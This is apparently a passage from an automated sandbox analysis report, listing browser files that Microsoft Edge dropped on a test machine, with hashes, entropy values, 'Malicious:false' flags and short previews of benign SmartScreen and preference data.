                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                                                              MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                                                              SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                                                              SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                                                              MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                                                              SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                                                              SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                                                              SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                                                              MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                                                              SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                                                              SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                                                              SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):130439
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                                                              MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                                                              SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                                                              SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                                                              SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                                                              MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                                                              SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                                                              SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                                                              SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):57
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                                                              MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                                                              SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                                                              SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                                                              SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                                                              MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                                                              SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                                                              SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):575056
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                                                              MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                                                              SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):460992
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                                                              MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                                                              SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                                                              MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                                                              SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                                                              SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                                                              SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:uriCache_

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):484
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.963149485905939
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:YWLSGI/m1kv/Ncc1jIfTVhYYm1kv/Ncv8fT/m1kv/NL4:YWLSrm1kuvpm1kuvom1k54
                                                                                                                                                                                                                                                                                                                                                              MD5:96B534B15412272E1E239BD3BCEC59D4
                                                                                                                                                                                                                                                                                                                                                              SHA1:5332C0AA67EEBC09C7B7156BFBE8750B1318611D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C4C6EBAB52C8B66B45D5A7DA7884F03EEB161443C845FCADBB6693530F616127
                                                                                                                                                                                                                                                                                                                                                              SHA-512:D0435965C833CF937562F6EC63C78CBC0612E8D3FAA9AB3A003D5FCE2296A9570AF03C0502C492A64AC4EFCEFD9C582FF39C93639712CDC5541F0F411BFD2C34
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"version":1,"cache_data":[{"file_hash":"6c3c315758103182","server_context":"1;c5faad59-a2e3-31f2-b86e-aaf958e12824;phsh:005;7e-05","result":0,"expiration_time":1739963829753559},{"file_hash":"ce5a6cad4ba98404","server_context":"1;c5faad59-a2e3-31f2-b86e-aaf958e12824;phsh:005;7e-05","result":0,"expiration_time":1739963827482678},{"file_hash":"b4bd859e7688c58b","server_context":"1;c5faad59-a2e3-31f2-b86e-aaf958e12824;phsh:005;7e-05","result":0,"expiration_time":1739963815599268}]}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                                                                              MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                                                                              SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                                                                              SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                                                                              SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\afc16f7d-bd8d-4b34-a5d2-3d9f04cc1e8e.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):45414
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.093318861782788
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:RDXzgWPsj/qlGJqIY8GB4xKwUUXqgfb3HzgmymhJMJEwO3UQYqGwLWZkHUfG6kCD:R/Ps+wsI7yOKSvgmNf6qfyW0e6kaoU
                                                                                                                                                                                                                                                                                                                                                              MD5:9EB9330E990B26E22CE56051F3A585CA
                                                                                                                                                                                                                                                                                                                                                              SHA1:85A7D5C8789B920C500736060C3F6D66AD45D036
                                                                                                                                                                                                                                                                                                                                                              SHA-256:671E6AF9ABC8C058E8DAEB11A554DB6926B877796614104707DEEDB36EEA0C06
                                                                                                                                                                                                                                                                                                                                                              SHA-512:6015DD6C8293CF68C84AEEE0C6B92FCF56B1E3A5944811865742968947BD1C05D2E29AA665AE5E202DD1A0430CC6022E97CA2FC2A08877047BE0F3E442F9A9E2
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1739863008"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0V

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b323f311-77f7-45af-8ae4-364c1400d676.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):45367
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.088375825018438
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:0MkbJ6eg6KzhXRLrZK5UUXqgfb3HzgmwemhJMJEwO3wG/CvokQYqGwLWZkHUfG6x:0Mk16zRRvZKhvgmwpfP/aoqqfyW0e6x
                                                                                                                                                                                                                                                                                                                                                              MD5:08C412C62E33ACA79F92C56CF4ED8842
                                                                                                                                                                                                                                                                                                                                                              SHA1:765CA9F3F508E7F7399DDBEDDE27E742262914D9
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0E8D68531960D235839513D359C9600205BA626D0526AA4A26599BC3DF014648
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B709A3EFB691ED0F3959E3FAE921B23BE9E2D44330AE460F36B3A9BB8608640867424D3D6E86F1980C9621C6BF86B10A23D6FEBA7DDE8599AB5EA97A6D798D43
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1739863008"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cac5cb35-617c-431c-b1a9-66dd89d3d805.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43978
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.091528782669861
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k6zUXqgfbcStXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7yn/1t3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                                                                                                                              MD5:092A83888EB1AD761669207E06A63E9E
                                                                                                                                                                                                                                                                                                                                                              SHA1:FA584236A279360A8F478B4ED87FB25B73FCAE17
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CCACA07B81A88A2412A9A711802C1C854D653E107A099B63C544795E197121DF
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F45C668874825CC133A5EE248328ABF1117694E14D890A4CEB23BE173BFF3678DC1AB5EA48ACEF7D0D74CF55A63F6D9E214CAF10013ED7821F8AE9276D1B1084
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
